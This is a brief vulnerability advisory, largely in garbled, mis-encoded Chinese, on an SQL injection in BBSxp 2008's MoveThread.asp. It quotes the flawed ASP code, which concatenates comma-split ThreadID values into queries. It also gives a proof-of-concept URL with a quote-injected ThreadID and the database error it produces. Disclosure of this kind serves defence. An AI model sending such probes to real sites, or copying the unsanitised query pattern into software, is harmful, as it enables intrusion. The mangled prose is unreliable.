BBSxp 2008 MoveThread.aspҳSQLע©

©汾:

Build: 8.0.4
©:

BBSXPΪһ򵥵ASP+SQLACCESSĶ̳ Ŀǰ°汾ΪBBSXP2008©ļ:MoveThread.asp
MoveThread.asp2-24<%
if CookieUserName =empty then error("δ<a href=""javascript:BBSXP_Modal.Open ('Login.asp',380,170);"">¼</a>̳") 'cookie½

ThreadID=Request("ThreadID") ' Sql Injection Vulnerability

If Not IsNumeric(ThreadID) then
ThreadIDArray=Split(ThreadID,",") 'ж,13г
if IsArray(ThreadIDArray) then
for i=0 to Ubound(ThreadIDArray)
if Execute ("Select ThreadID from ["&TablePrefix&"Threads] where ThreadID="& ThreadIDArray(i)&"").eof then error"<li>ϵͳڸӵ"
next
ThreadIDSql=int(ThreadIDArray(0))
else
error("")
end if
Else
ThreadIDSql=int(ThreadID)
End If

ForumID=Execute("Select ForumID From ["&TablePrefix&"Threads] where ThreadID="&ThreadIDSql&"")(0)
%>
<!C #include file="Utility/ForumPermissions.asp" C>ִ˲ѯжȨޣͨûɽsqlע䡣
Urlhttp://www.target.com/movethread.asp?ThreadID=1,1'
ύسϢ

Microsoft JET Database Engine  '80040e14'

ַ﷨ ڲѯʽ 'ThreadID=1'' С

/BBSXP_Class.asp 5

 <* ο
 Tr4c3[at]126[dot]Com
 *>